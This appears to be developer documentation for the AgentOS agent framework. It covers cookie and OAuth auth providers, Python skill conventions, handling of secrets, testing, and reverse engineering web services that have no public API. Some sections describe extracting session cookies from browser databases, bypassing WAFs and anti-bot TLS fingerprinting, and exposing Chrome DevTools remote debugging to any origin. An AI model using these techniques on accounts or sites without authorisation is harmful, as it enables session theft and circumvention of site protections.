with http.client(cookies=cookie_header) as c:
resp = c.get(url, **http.headers(waf="cf", accept="html"))
The SDK helpers get_cookies(params) and require_cookies(params, op) extract the cookie header from params.auth.cookies:
from agentos.http import require_cookies
cookie_header = require_cookies(params, "list_orders")
# Raises ValueError if no cookies available
Individual cookie values are also available as .auth.{cookie_name} — e.g. .auth.sessionKey — for operations that need specific cookies by name rather than the full header string.
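The per-name values can be derived from the header string with a simple split. A minimal sketch of that parsing (the engine does this for you; this is only to show the format):

```python
def split_cookie_header(header: str) -> dict:
    """Split an HTTP Cookie header string into {name: value} pairs."""
    out = {}
    for part in header.split(";"):
        part = part.strip()
        if "=" in part:
            name, _, value = part.partition("=")
            out[name] = value
    return out

auth = split_cookie_header("sessionKey=abc123; lastActiveOrg=org_42")
print(auth["sessionKey"])  # → abc123
```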
Cookie domain filtering (RFC 6265)
The engine automatically filters cookies by RFC 6265 domain matching when resolving auth. If a connection declares base_url: "https://riders.uber.com", only cookies whose domain matches riders.uber.com (including parent domains like .uber.com) are included. Sibling subdomain cookies (.auth.uber.com, .www.uber.com) are filtered out. Skills don’t need to handle this — the provider does it automatically.
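The matching rule reduces to: exact host match, or the host is a subdomain of the cookie’s domain attribute. A simplified sketch (the engine’s real implementation handles additional RFC 6265 details such as host-only cookies):

```python
def domain_matches(cookie_domain: str, host: str) -> bool:
    """Simplified RFC 6265 domain-match: a leading dot means
    'this domain and all its subdomains'."""
    d = cookie_domain.lstrip(".").lower()
    host = host.lower()
    return host == d or host.endswith("." + d)

# riders.uber.com keeps parent-domain cookies, drops sibling subdomains
assert domain_matches(".uber.com", "riders.uber.com")
assert domain_matches("riders.uber.com", "riders.uber.com")
assert not domain_matches(".auth.uber.com", "riders.uber.com")
assert not domain_matches(".www.uber.com", "riders.uber.com")
```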
Cookie identity resolution
Cookie-auth skills should resolve account identity so the graph knows who the session belongs to. Two deterministic paths exist:
JSON APIs — use check.identifier and check.display on the auth block. The check block handles liveness and identity in one HTTP call using jaq expressions on the JSON response:
connections:
web:
auth:
type: cookies
domain: ".claude.ai"
names: ["sessionKey"]
check:
url: "https://claude.ai/api/organizations"
expect_status: 200
identifier: '.[] | select(.capabilities | contains(["chat"])) | .email'
display: '.[] | select(.capabilities | contains(["chat"])) | .name'
HTML services — use a Python operation with an account adapter. When the introspection endpoint returns HTML (not JSON), identity extraction belongs in Python. The skill declares an account adapter and a check_session operation with returns: account:
adapters:
account:
id: .customer_id
name: .display
issuer: .issuer
data.marketplace_id: .marketplace_id
operations:
check_session:
returns: account
connection: web
python:
module: ./my_skill.py
function: whoami
params: true
timeout: 30
The Python function parses the HTML and returns structured identity data including issuer (the service domain, e.g. "amazon.com"), customer_id (a stable account ID used as the adapter id), and display (a human-friendly name). The extraction pipeline automatically links account-tagged nodes to the primary user via Person --claims--> Account.
Include issuer in the account adapter — it’s the join key that links the graph entity to credential store rows. The adapter id field doubles as the account identifier for dedup.
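A minimal sketch of such an identity function. The HTML is inlined here for illustration (a real skill would fetch it via agentos.http), and the markup and field values are hypothetical:

```python
import re

def whoami(params):
    """Parse an account page and return structured identity data."""
    body = '<span data-customer-id="A1B2C3">Hello, Joe</span>'
    customer_id = re.search(r'data-customer-id="([^"]+)"', body).group(1)
    display = re.search(r"Hello, ([^<]+)", body).group(1)
    return {
        "customer_id": customer_id,  # stable account ID → adapter id (dedup key)
        "display": display,          # human-friendly name → adapter name
        "issuer": "example.com",     # join key to credential store rows
    }
```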
Leading by example: skills/amazon/ (HTML identity via Python), skills/claude/ (JSON identity via check block).
Provider auth
Credentials can come from other installed apps (e.g. Mimestream provides Google OAuth tokens, Brave provides browser cookies).
Skill-level provides: is a typed list: each entry is either tool (capability routing) or auth (auth supply).
OAuth provider (excerpt):
provides:
- auth: oauth
service: google
via: credential_get
scopes:
- https://mail.google.com/
Cookie provider (excerpt):
provides:
- auth: cookies
via: cookie_get
description: "Cookies from Brave Browser profiles"
Consumer skills don’t name a specific provider — the runtime discovers installed providers automatically via find_auth_providers(type, scope).
Three cookie providers are available: Brave (reads SQLite cookie DB), Firefox (reads SQLite cookie DB), and Playwright (reads from persistent Chromium session via CDP). Playwright is the primary provider for cookies acquired through login automation flows.
Example references:
- OAuth consumer: skills/gmail/skill.yaml
- OAuth provider: skills/mimestream/skill.yaml
- Cookie consumer: skills/claude/skill.yaml
- Cookie provider (browser DB): skills/brave-browser/skill.yaml
- Cookie provider (automation): skills/playwright/skill.yaml
- Multi-connection: skills/goodreads/skill.yaml (graphql + web)
Auth failure convention for Python skills
When a Python skill detects an authentication failure, it should raise an exception rather than returning an error dict. Two conventions exist, and the engine handles both:
Convention 1: SESSION_EXPIRED: prefix (preferred for cookie-auth skills)
Use SESSION_EXPIRED: when the skill can definitively detect that the session is stale — typically via login redirects, expired-session pages, or specific error responses. This is the recommended convention for cookie-authenticated skills.
def list_orders(params):
cookie_header = _require_cookies(params, "list_orders")
with _auth_client(cookie_header) as client:
resp = client.get(f"{BASE}/your-orders/orders")
body = resp.text
if _is_login_redirect(resp, body):
raise RuntimeError(
"SESSION_EXPIRED: Amazon redirected to login — session cookies are expired or invalid."
)
return _parse_orders(body)
Format: SESSION_EXPIRED: <human-readable reason>
The engine catches this prefix, excludes the current cookie provider from the candidate list, and retries with the next-best provider. This handles the common case where one browser has stale cookies but another (e.g. Playwright with a live session) has fresh ones.
Convention 2: HTTP status codes in exception message (fallback)
For API-style endpoints that return standard HTTP status codes, include 401, 403, unauthorized, or forbidden in the exception message:
def get_api_keys(cookies: str) -> dict:
resp = client.get("/api/keys")
if resp.status_code in (401, 403):
raise Exception(f"Unauthorized (HTTP {resp.status_code}): session expired")
Both conventions trigger the same retry behavior: invalidate the cookie cache, exclude the failing provider, and re-run with fresh cookies.
When to use which
| Situation | Convention |
|---|---|
| HTML scraping — login redirect detected | SESSION_EXPIRED: prefix |
| HTML scraping — auth wall / sign-in page | SESSION_EXPIRED: prefix |
| JSON API returns 401/403 | HTTP status in exception |
| Dashboard returns error JSON with “expired” | Either — SESSION_EXPIRED: is clearer |
Provider retry behavior
The engine retries once on auth failure, with the failing provider excluded:
1. Engine selects best provider (e.g. Brave, 23 cookies)
2. Skill runs, raises SESSION_EXPIRED
3. Engine excludes Brave, re-selects (e.g. Playwright, 16 cookies)
4. Skill runs again with Playwright's cookies
5. If this also fails → error surfaces to the caller (no infinite loops)
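The steps above amount to a one-retry loop with provider exclusion. A minimal sketch (function and provider names are hypothetical):

```python
def run_with_retry(operation, providers):
    """Run once; on SESSION_EXPIRED, exclude the failed provider and retry once."""
    excluded = set()
    for attempt in range(2):  # initial run + at most one retry
        provider = next(p for p in providers if p not in excluded)
        try:
            return operation(provider)
        except RuntimeError as e:
            if attempt == 0 and str(e).startswith("SESSION_EXPIRED:"):
                excluded.add(provider)  # re-select without the failed provider
            else:
                raise  # second failure surfaces to the caller — no infinite loops

calls = []
def op(provider):
    calls.append(provider)
    if provider == "brave":
        raise RuntimeError("SESSION_EXPIRED: stale cookies")
    return f"ok via {provider}"

print(run_with_retry(op, ["brave", "playwright"]))  # → ok via playwright
```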
Cookie provider selection
When multiple browser cookie providers are installed (Brave, Firefox), they all
run as candidates alongside the cache and store. The winner is determined by
newest_cookie_at — the latest per-cookie timestamp across all cookies.
Within the provider tier (when comparing two browser providers against each other), the scoring heuristic breaks ties:
- Required cookie names — providers that have all cookies listed in the connection’s names field score highest
- Creation timestamp — the provider whose cookies were created most recently wins
- Cookie count — final tiebreaker when all else is equal
Playwright is always skipped unless explicitly requested (see above).
Explicit provider override
When the automatic selection picks wrong (or for testing), pass provider as a
top-level argument to run():
run({ skill: "amazon", tool: "list_orders", provider: "playwright" })
This bypasses the selection heuristic entirely and uses the specified provider.
Valid provider names are the skill IDs of installed cookie providers (e.g.
"playwright", "brave-browser", "firefox").
Python Skills
Use the python: executor when a skill needs Python logic (parsing, API glue, multi-step flows). It calls a function directly in a Python module — no binary: python3 boilerplate, no sys.argv dispatch, no | tostring on every arg.
Basic shape
operations:
get_schedule:
description: Get today's class schedule
returns: class[]
params:
date: { type: string, required: false }
location_id: { type: integer, default: 6 }
python:
module: ./my_script.py
function: get_schedule
args:
date: .params.date
location_id: .params.location_id
timeout: 30
The Python function receives keyword arguments and returns shape-native data — dicts whose keys match the declared shape:
def get_schedule(date: str = None, location_id: int = 6) -> list[dict]:
# ... fetch from API ...
return [
{
"id": cls["id"],
"name": cls["title"],
"datePublished": cls["start_time"],
"text": cls["description"],
# shape-specific fields
"instructor": cls.get("coach_name"),
"capacity": cls.get("max_capacity"),
}
for cls in raw_classes
]
The function does the field mapping — it transforms raw API/service data into dicts matching the shape declared in returns:. No separate mapping layer is needed.
Rules:
- module is resolved relative to the skill folder (use ./my_script.py)
- function is the function name in the module
- args values are jaq expressions resolved against the params context (same as rest.body)
- Shorthand: when the Python function expects a single params dict, use params: true instead of args: { params: .params }
- Args are passed as typed JSON — integers stay integers, no | tostring needed
- timeout defaults to 30 seconds
- response mapping (root, transform) works the same as rest: and graphql:
- Auth values are available via .auth.* in args expressions
- The runtime handles I/O — just return a value from your function
Examples: gmail, claude, goodreads, granola, cursor, here-now.
Returning shape-native data
When an operation declares returns: email[], the Python function must return a list of dicts matching the email shape. Use standard fields (id, name, text, url, image, author, datePublished, content) plus any shape-specific fields.
# gmail.py — returns email-shaped dicts directly
def get_email(id: str, url: str = None, _call=None) -> dict:
# ... Gmail API logic ...
return {
"id": msg_id,
"name": subject, # standard: primary label
"text": snippet, # standard: preview text
"url": f"https://mail.google.com/...",
"datePublished": internal_date, # standard: temporal anchor
"content": body_text, # standard: long body (FTS)
# email-specific fields from shape
"from_email": sender,
"to": recipients,
"labels": label_ids,
}
For typed references (relations to other entities), return nested dicts keyed by entity type:
def get_email(id: str, _call=None) -> dict:
return {
"id": msg_id,
"name": subject,
# typed reference — creates a linked account entity
"from": {
"account": {
"handle": sender_email,
"platform": "email",
"display_name": sender_name,
}
},
}
Connection dispatch
When a skill has multiple connections that serve the same operations via different transports (SDK vs CLI, live API vs cache), the Python helper receives the active connection and dispatches accordingly:
operations:
list_items:
description: List items from the service
returns: item[]
connection: [sdk, cli]
python:
module: ./my_skill.py
function: list_items
args:
vault: .params.vault
connection: '.connection'
timeout: 60
def list_items(vault, connection=None):
if connection and connection.get("id") == "sdk":
return _list_via_sdk(vault, connection["vars"])
else:
return _list_via_cli(vault, connection.get("vars", {}))
Both code paths return the same shape-native dicts. This pattern is useful when a primary path (SDK with batch ops) needs a stable fallback (CLI with subprocess calls). See skills/granola/ for the api + cache variant of this pattern.
_call dispatch
When a Python operation needs to compose multiple API calls (e.g. list returns stubs, get returns full data), use _call to invoke sibling operations. The engine injects _call automatically when the function signature accepts it.
def list_emails(query="", limit=20, _call=None):
stubs = _call("list_email_stubs", {"query": query, "limit": limit})
return [_call("get_email", {"id": s["id"]}) for s in stubs]
The YAML wires the Python function as usual:
operations:
list_emails:
description: List emails with full content
returns: email[]
python:
module: ./gmail.py
function: list_emails
args:
query: '.params.query // ""'
limit: '.params.limit // 20'
timeout: 120
list_email_stubs:
description: "Internal: list email IDs only"
returns: email[]
rest:
url: "/messages"
method: GET
query:
maxResults: ".params.limit // 20"
q: ".params.query"
response:
transform: ".messages // []"
Rules:
- _call can only call operations in the same skill — no cross-skill calls
- The engine executes each dispatched call with full credential injection (OAuth, cookies, API keys)
- Python never sees raw credentials — the engine is the only process that touches tokens
- _call is synchronous and blocking — each call completes before the next starts
- The same account context from the parent call is used for dispatched operations
- If a function’s signature does not include _call (or **kwargs), it is not injected — existing functions work unchanged
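The signature-based injection rule can be modeled with inspect.signature. This is a sketch of the behavior, not the engine’s actual dispatch code:

```python
import inspect

def should_inject_call(func) -> bool:
    """_call is injected only when the signature accepts it,
    either explicitly or via **kwargs."""
    sig = inspect.signature(func)
    if "_call" in sig.parameters:
        return True
    return any(p.kind is inspect.Parameter.VAR_KEYWORD
               for p in sig.parameters.values())

def legacy(query): ...                 # no _call → not injected, works unchanged
def modern(query, _call=None): ...     # explicit parameter → injected
def flexible(**params): ...            # **kwargs → injected

assert not should_inject_call(legacy)
assert should_inject_call(modern)
assert should_inject_call(flexible)
```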
Leading by example: skills/gmail/gmail.py (list + hydrate pattern with _call).
Auth Flows
When a skill needs credentials from a web dashboard (API keys, session tokens), the flow is: discover with Playwright, implement with agentos.http. For steps that agentos.http can’t replay (native form POSTs, complex redirect chains), the agent uses Playwright for that step and agentos.http for everything after.
The pattern
- Discover — use the Playwright skill interactively to walk through the login/signup flow. capture_network reveals endpoints, cookies shows what session cookies get set, inspect shows form structure.
- Implement — write the login flow as Python + agentos.http in the skill’s .py file. Use http.headers() for WAF bypass and inject cookies from params.auth.cookies or _call to other skills (e.g. Gmail for magic links, brave-browser for Google session cookies).
- Store — return extracted credentials via __secrets__ so the engine stores them securely. The LLM never sees raw secret values.
- Test — test-skills.cjs should work without a running browser. If your skill needs Playwright at runtime, rethink the approach.
Dashboard connections
Skills with web dashboards declare a dashboard connection alongside their api connection:
connections:
api:
base_url: "https://api.example.com"
auth:
type: api_key
header: { x-api-key: .auth.key }
dashboard:
base_url: "https://dashboard.example.com"
auth:
type: cookies
domain: ".example.com"
login:
- sso: google
- email_link: true
All auth goes under a single auth: key with a type discriminator (api_key, cookies, oauth). The login block declares available login methods. Login operations are Python functions that execute the flow with agentos.http. See specs/auth-model.md in the engine repo for the unified auth model, and specs/sso-credential-bootstrap.md for the end-to-end bootstrap flow.
Secret-safe credential return
Login and API key extraction operations return credentials via __secrets__:
def get_api_key(*, _call=None, **params):
# ... HTTPX calls to get the key ...
return {
"__secrets__": [{
"issuer": "api.example.com",
"identifier": "user@example.com",
"item_type": "api_key",
"label": "Example API Key",
"source": "example",
"value": {"key": api_key},
"metadata": {"masked": {"key": "••••" + api_key[-4:]}}
}],
"__result__": {"status": "authenticated", "identifier": "user@example.com"}
}
The engine writes __secrets__ to the credential store, creates an account entity on the graph, and strips the secrets before the MCP response reaches the agent.
Cookie resolution chain
The engine uses timestamp-based resolution — all cookie sources are checked, and the one with the newest cookies wins. There’s no fixed priority order. See connections.md → Resolution Algorithm for the full explanation with worked examples.
Sources (all checked on every resolve):
- In-memory cache — cookies from the last extraction, updated by Set-Cookie responses from our own HTTP requests (writeback). Can be newer than the browser when a server rotates tokens.
- Browser providers (Brave, Firefox) — fresh extraction from the browser’s local cookie database (~20ms). Reflects the user’s latest browsing.
- Credential store (credentials.sqlite) — persistent copy, also updated by writeback. Survives engine restart.
The candidate with the highest newest_cookie_at (latest per-cookie timestamp) wins. On ties, the cache wins (first candidate). No TTL — timestamps are the only arbiter.
Playwright is always skipped unless explicitly requested via the provider parameter. It’s used for reverse engineering and login automation, not runtime auth.
Provider scoring (within the provider tier)
When multiple browser providers return cookies for the same domain:
- Required names — providers with all cookies listed in auth.names score highest
- Creation timestamp — most recently created cookies win
- Cookie count — final tiebreaker
Retry on auth failure
On SESSION_EXPIRED: prefix (or Python exceptions containing 401, 403,
unauthorized, forbidden), the engine:
- Marks the current provider as failed
- Excludes it from the candidate list
- Re-runs provider selection — next-best provider wins
- Retries the operation once with the new provider’s cookies
This means a skill with stale Brave cookies and fresh Playwright cookies will automatically fall back to Playwright after Brave fails. One retry only — no infinite loops.
Explicit provider override
For testing or when auto-selection picks wrong:
run({ skill: "amazon", tool: "list_orders", provider: "playwright" })
The provider argument bypasses the selection heuristic entirely.
Providers always return the full cookie jar
The names field in connection auth is purely a selection hint — it helps
the engine choose the right provider. Providers always return all cookies for the
domain, never a filtered subset. Skills that need the full cookie jar (which is
most of them) work correctly regardless of whether names is declared.
Key rules
- Never import Playwright in skill Python code. Playwright is a separate skill for investigation. Skill operations use agentos.http.
- All I/O through SDK modules. http.get/post, shell.run, sql.query. Never urllib, subprocess, sqlite3, requests, httpx.
- Never expose secrets in __result__. Secrets go in __secrets__ only. The agent sees masked versions via metadata.masked.
- _call is same-skill only. It dispatches to sibling operations within the same skill (e.g. Gmail’s list_emails calling get_email). It cannot call operations in other skills.
- Cross-skill coordination goes through the agent. If a login flow needs email access, the operation yields back to the agent (see below), and the agent uses whatever email capability is available.
Agent-in-the-loop auth flows
Some login flows require input the skill can’t obtain on its own — a verification code from email, an SMS code, or user approval. These flows must yield back to the agent rather than trying to handle the dependency internally.
Why not handle it in Python?
- _call is same-skill only — Python can’t call gmail.search_emails from inside exa.py
- Blocking in Python for 60 seconds while polling gives the agent no visibility or control
The multi-step pattern
Split the flow so the agent orchestrates between agentos.http operations and Playwright when needed:
Agent calls skill.send_login_code({ email })
→ Python/agentos.http: CSRF + trigger verification email
→ Returns: { status: "code_sent", hint: "..." }
Agent checks email (any provider) and extracts the code
Agent uses Playwright to complete login (if `agentos.http` can't replay the code submission)
→ Navigate to login page, type email, submit, type code, submit
→ Extract cookies from browser
Agent calls skill.store_session_cookies({ email, session_token, ... })
→ Python/agentos.http: validates session, stores via __secrets__
The hint field tells the agent what to search for (e.g. “subject ‘Sign in to Exa Dashboard’ from exa.ai”). The agent knows how to search email — it picks the right provider and extracts the code.
Why Playwright for the code submission? Some auth implementations (e.g. Exa’s NextAuth) submit verification codes via a native HTML form POST that HTTPX cannot replay — the server-side handling differs from a programmatic POST. The fetch interceptor captures nothing, but the browser navigates successfully. When this happens, use Playwright for the form submission step and agentos.http for everything else.
When to use this pattern
- Email verification codes (Exa, any NextAuth email provider)
- SMS/TOTP verification
- OAuth consent that requires user approval
- Any flow where the skill needs external input it can’t obtain via _call
- Any step where agentos.http replay fails but the browser works (native form POSTs, complex redirect chains)
Example: Exa
See skills/exa/exa.py:
- send_login_code — triggers the verification email (HTTPX)
- store_session_cookies — validates and stores browser-extracted session cookies (HTTPX)
- The agent uses Playwright between these two operations to enter the code and complete login
Future: session-scoped state
Passing CSRF tokens through params works but is noisy. The target is session-scoped temporary storage (tied to the MCP/agent session) so Python can write state in step 1 and read it in step 2 without the agent seeing the plumbing. See the engine roadmap for “Session-scoped state for auth flows.”
For the full reverse engineering methodology, see:
- Auth & Runtime — credential bootstrap lifecycle, network interception, cookie mechanics, CSRF patterns, web navigation
- NextAuth.js guide — vendor-specific patterns for NextAuth/Auth.js sites
- WorkOS guide — vendor-specific patterns for WorkOS-based auth
Data & Storage
Sandbox storage
Skills can persist state across runs using two reserved keys on their graph node:
- cache — regeneratable state (discovered endpoints, scraped tokens). Can be cleared at any time; the skill re-discovers on next run.
- data — persistent state (settings, preferences, sync timestamps). Survives cache clears.
If losing it requires user action to recover (re-entering a setting), it’s data. If the skill can regenerate it, it’s cache.
Reading
The execution context always includes .data and .cache:
{ "params": { ... }, "auth": { ... }, "data": { ... }, "cache": { ... } }
In YAML expressions:
rest:
url: '(.cache.graphql_endpoint // "https://fallback.example.com/graphql")'
In Python, pass cache and/or data via args::
python:
module: ./my_script.py
function: search
args:
query: .params.query
cache: .cache
Writing back
Python and command executors write back using reserved keys in their return value:
- __cache__ — merged into the skill node’s cache
- __data__ — merged into the skill node’s data
- __result__ — the actual result callers see
def discover_endpoint(cache=None, **kwargs):
if cache and cache.get("graphql_endpoint"):
return {"endpoint": cache["graphql_endpoint"]}
endpoint = _discover()
return {
"__cache__": {"graphql_endpoint": endpoint},
"__result__": {"endpoint": endpoint},
}
If neither __cache__ nor __data__ is present, the result passes through unchanged. Fully backward compatible.
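The writeback contract can be modeled in a few lines. This is a sketch of the engine behavior described above, not its actual implementation:

```python
def process_writeback(node: dict, returned: dict):
    """Merge reserved keys into the skill node, then hand callers __result__
    (or the value unchanged when no reserved keys are present)."""
    node.setdefault("cache", {}).update(returned.get("__cache__", {}))
    node.setdefault("data", {}).update(returned.get("__data__", {}))
    if any(k in returned for k in ("__cache__", "__data__", "__result__")):
        return returned.get("__result__")
    return returned  # no reserved keys → fully backward compatible passthrough

node = {"cache": {}}
out = process_writeback(node, {
    "__cache__": {"graphql_endpoint": "https://x/graphql"},
    "__result__": {"endpoint": "https://x/graphql"},
})
print(out)  # → {'endpoint': 'https://x/graphql'}; node["cache"] now holds the endpoint
```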
__secrets__ — secret store writes
A third reserved key, __secrets__, handles importing secrets from external sources (password managers, payment info, identity documents, etc.) into the credential store. The __secrets__ handler is pure credential store CRUD — it writes credential rows and strips the key. It does not create graph entities or edges; entity creation happens through the normal adapter pipeline processing __result__. The two systems are joined by (issuer, identifier).
def import_items(vault, dry_run=False):
items = fetch_from_source(vault)
if dry_run:
return [{"issuer": i["issuer"], "label": i["label"]} for i in items]
return {
# Secrets → credential store (engine writes rows, strips key)
"__secrets__": [
{
"item_type": "password",
"issuer": "github.com",
"identifier": "joe",
"label": "GitHub",
"source": "mymanager",
"value": {"password": "..."},
"metadata": {"masked": {"password": "••••••••"}}
},
{
"item_type": "credit_card",
"issuer": "chase",
"identifier": "visa-4242",
"label": "Personal Visa",
"source": "mymanager",
"value": {"card_number": "4111111111114242", "cvv": "123"},
"metadata": {"masked": {"card_number": "••••4242", "cvv": "•••"}}
}
],
# Entities → shaped by adapters into graph nodes
"__result__": [
{"issuer": "github.com", "identifier": "joe", "title": "GitHub",
"category": "LOGIN", "url": "https://github.com", "username": "joe"},
{"issuer": "chase", "identifier": "visa-4242", "title": "Personal Visa",
"category": "CREDIT_CARD", "cardholder": "Joe", "card_type": "Visa",
"expiry": "12/2027", "masked": {"card_number": "••••4242", "cvv": "•••"}}
]
}
The trust model: Python sees secrets (it reads them from the source), the engine intercepts and encrypts them, the agent never sees them — only metadata (including masked representations). Graph entities carry masked previews (“Visa ending in 4242”) so the agent can reason about which card to use without seeing the full number.
See spec/credential-system.md and spec/1password-integration.md in the engine repo for full design.
Status: Implemented (Phase A). The engine intercepts __secrets__ in process_storage_writeback(), writes credential rows to credentials.sqlite, creates account entities and claims edges on the graph, then strips the key before the MCP response.
Leading by example: skills/goodreads/public_graph.py (GraphQL endpoint discovery cached via __cache__).
Expressions
Use one expression style everywhere:
- rest:, graphql:, command:, python:, and connection auth fields all use jq/jaq-style expressions
- Resolved credentials are available under .auth.* such as .auth.key or .auth.access_token
Common jq/jaq patterns:
url: '"/items/" + .params.id'
query:
q: .params.query
limit: .params.limit // 10
body:
title: .params.title
Common command patterns:
command:
binary: python3
args:
- ./my_script.py
- run
stdin: '.params | tojson'
When a command: argument or working_dir: looks like a relative file path, it is resolved relative to the skill folder. Prefer ./my_script.py over machine-specific absolute paths.
If you need advanced command, steps, or crypto behavior, copy from an existing skill.
Views & Output
The run tool accepts:
view:
detail: preview | full
format: markdown | json
Rules:
- `detail` changes data volume; `format` changes representation
- Default is markdown preview
- Preview keeps canonical fields and truncates long text
- Full returns all mapped fields
- JSON returns a `{ data, meta }` envelope
This is why canonical mapping fields matter — the renderer uses them to produce consistent previews across all skills. See Adapters for the canonical field table.
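For illustration, a full-detail JSON response might look like this (contents and meta fields are hypothetical — only the `{ data, meta }` envelope is guaranteed by the contract):

```python
# Hypothetical envelope for a hackernews list_posts call in JSON/full view
envelope = {
    "data": [
        {"name": "Show HN: ...", "author": "pg",
         "url": "https://news.ycombinator.com/..."},
    ],
    "meta": {"skill": "hackernews", "operation": "list_posts", "detail": "full"},
}
```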
Testing & Validation
Shape validation: agentos test
The primary tool for validating that skill output matches declared shapes. Run it after any skill change.
agentos test hackernews # test all operations
agentos test amazon --op search_products # test one operation
This loads skill.yaml and shapes/*.yaml from disk, executes each testable operation, and validates the output field-by-field against the shape. No running engine needed.
hackernews
──────────
list_posts (post[])
✓ 20 records returned (485ms)
✓ author — 20/20 valid
✓ datePublished — 20/20 valid
✓ name — 20/20 valid
✓ url — 20/20 valid
⚠ 3 extra fields not in shape: account, engagement, skill
search_posts (post[]) — skipped (required params missing from test.params)
4 operations · 1 tested · 3 skipped
Test configuration
Add a test: block to operations in skill.yaml to provide test params or skip dangerous operations:
operations:
search_products:
returns: product[]
test:
params: # input params for test execution
query: "usb c cable"
create_order:
returns: order
test:
skip: true # has side effects — don't auto-run
| Field | Type | Default | Purpose |
|---|---|---|---|
| `params` | object | `{}` | Params passed to the operation during test |
| `skip` | boolean | `false` | Skip this operation in automated test runs |
When operations are skipped:
- `skip: true` — explicitly opted out
- Required params have no defaults and no `test.params`
- `returns` is `void` or an inline schema (not a shape reference)
- The shape referenced in `returns` doesn’t exist in the registry
When operations run:
- Operations with no params run automatically
- Operations with all-optional params (or params with defaults) run automatically
- Operations with `test.params` covering required params run with those params
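The run/skip rules above can be sketched as a predicate (illustrative only — the real logic lives in the agentos binary, and the per-param metadata shape shown here is an assumption):

```python
def should_run(op: dict, shapes: set) -> bool:
    """Decide whether an operation is auto-testable (sketch of the rules)."""
    test = op.get("test", {})
    if test.get("skip"):
        return False                          # explicitly opted out
    returns = op.get("returns")
    if returns is None or returns == "void" or isinstance(returns, dict):
        return False                          # void or inline schema
    if returns.rstrip("[]") not in shapes:
        return False                          # shape not in the registry
    # Required params must be covered by test.params (or have defaults)
    required = {name for name, p in op.get("params", {}).items()
                if p.get("required") and "default" not in p}
    return required <= set(test.get("params", {}))
```

Under these rules, a no-param operation runs automatically, while one with uncovered required params is skipped.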
Direct MCP testing
For inspecting the full MCP response (including rendering, entity extraction, and metadata), use direct MCP calls:
Skill-level testing (community repo)
mcp:call and mcp:test automatically use the newest built agentos binary. Set AGENTOS_BINARY=/path/to/agentos if you need to force a specific one.
# JSON preview
npm run mcp:call -- \
--skill exa --tool search \
--params '{"query":"rust ownership","limit":1}' \
--format json --detail preview
# JSON full
npm run mcp:call -- \
--skill exa --tool search \
--params '{"query":"rust ownership","limit":1}' \
--format json --detail full
# Markdown full (raw MCP response)
npm run mcp:call -- \
--skill exa --tool search \
--params '{"query":"rust ownership","limit":1}' \
--detail full --raw
Engine-level testing (core repo)
The core repo has a generic MCP test harness at ~/dev/agentos/scripts/mcp-test.mjs that speaks raw JSON-RPC to the engine binary:
cd ~/dev/agentos
# List all MCP tools (built-in + dynamic)
node scripts/mcp-test.mjs stdio "./target/release/agentos mcp"
# Call a dynamic capability tool
node scripts/mcp-test.mjs stdio "./target/release/agentos mcp" call web_search '{"query":"rust"}'
Use this when you’re changing provides: entries, engine routing, or tool schemas.
Quick smoke test: agentos call
Native Rust MCP client built into the binary — fastest path for one-off checks:
agentos call boot # verify engine is alive
agentos call run '{"skill":"exa","tool":"search","params":{"query":"test"}}'
Validation
Before committing a skill:
npm run validate # schema + structural checks
agentos test <skill> # shape validation
npm run mcp:call -- --skill <skill> ... # inspect full MCP output
What validate catches:
- Schema shape and unknown keys (via `audit-skills.py` vs Rust `types.rs`)
- Basic structural problems
- Advisory duplicate adapter mappings
What agentos test catches:
- Field type mismatches (value doesn’t match declared shape type)
- Extra fields returned but not declared in the shape
- Missing shape fields (info only — fields are optional)
- Relation target validation (nested records checked recursively)
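In the same spirit, a toy field-by-field validator (a simplified sketch, not `agentos test`'s actual implementation — real shapes carry richer type info than Python types):

```python
def validate_records(records, shape):
    """Check each record's fields against a {field: python_type} shape.
    Missing fields are tolerated (shape fields are optional); type
    mismatches and extra fields are reported."""
    problems = []
    for i, rec in enumerate(records):
        for field, expected in shape.items():
            if field in rec and not isinstance(rec[field], expected):
                problems.append(
                    f"record {i}: {field} is "
                    f"{type(rec[field]).__name__}, expected {expected.__name__}")
        for field in rec.keys() - shape.keys():
            problems.append(f"record {i}: extra field {field!r} not in shape")
    return problems
```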
Checklist
Before you commit a skill:
- `npm run validate` passes
- `agentos test <skill>` passes (no field errors)
- Direct MCP preview/full output looks correct
- Uses inline `returns:` schemas for non-entity or action-style tools
- Read-safe ops have `test.params` for automated testing
- Mutating ops declare `test.skip: true`
- Multi-connection skills declare `connection:` on each operation
- REST URLs are relative when the connection has a `base_url`
- If the contract changed, the book is updated in the same PR
Reverse Engineering
How to build skills against web services that don’t have public APIs. This is the methodology for extracting data surfaces, auth flows, and content from any website — then packaging them as reliable AgentOS skills.
The layers
Each layer builds on the previous. Start at transport, work up.
| Layer | What it covers | When you need it |
|---|---|---|
| 1. Transport | TLS fingerprinting, WAF bypass, Playwright stealth, HTTP/2 | Service blocks automated requests |
| 2. Discovery | Next.js/Apollo caches, JS bundle config, GraphQL schema scanning | Finding API endpoints and data shapes |
| 3. Auth & Runtime | Credential bootstrap, login/signup flows, CSRF, cookies, API key management, network interception | Logging in and managing session state |
| 4. Content | Pagination, infinite scroll, content extraction | Scraping actual data from pages |
| 5. Social Networks | Social graph traversal, friend lists, activity feeds | Working with social platforms |
| 6. Desktop Apps | Electron asar extraction, native app IPC, plist configs | Local apps without web APIs |
| 7. MCP Servers | Wrapping existing MCP servers as skills | When someone already built an MCP server |
Core principle
CDP discovers, agentos.http runs.
Use browse capture (CDP to a real browser) to investigate — navigate pages, capture every network request with full headers and response bodies, inspect cookies. Then implement what you learned as Python + agentos.http in the skill. No browser at runtime.
Why CDP to real browsers, not Playwright? Playwright’s bundled Chromium has a detectable TLS fingerprint (JA3/JA4) that anti-bot systems flag. CDP to the user’s real Brave/Chrome produces authentic TLS fingerprints, real GPU canvas rendering, and uses existing sessions. Sites like Amazon reject Playwright but accept real browsers. See Transport for the full analysis.
Headers are built in Python via http.headers() with independent knobs (waf=, accept=, mode=, extra=). The Rust engine is pure transport — it sets zero default headers.
The progression:
1. Search — check `web_search` for prior art, existing docs, API references.
2. Discover — use `browse capture` to probe the live site via CDP. Launch Brave with `--remote-debugging-port=9222 --remote-allow-origins="*"`, then `python3 bin/browse-capture.py <url> --port 9222`. Captures all requests, responses, headers, cookies, and API response bodies automatically.
3. Extract API surface — grep the site’s JS bundles for endpoint patterns (e.g. `grep -oE 'get[A-Z][a-zA-Z]+V[0-9]+' bundle.js`). This reveals the full API surface without navigating every page.
4. Replay — reproduce what you found with `agentos.http` + cookies. Use `http.headers()` for WAF bypass. Test with `agentos browse request <skill> <url>`.
5. Implement — write the skill operation in Python with `agentos.http`. No browser dependency at runtime.
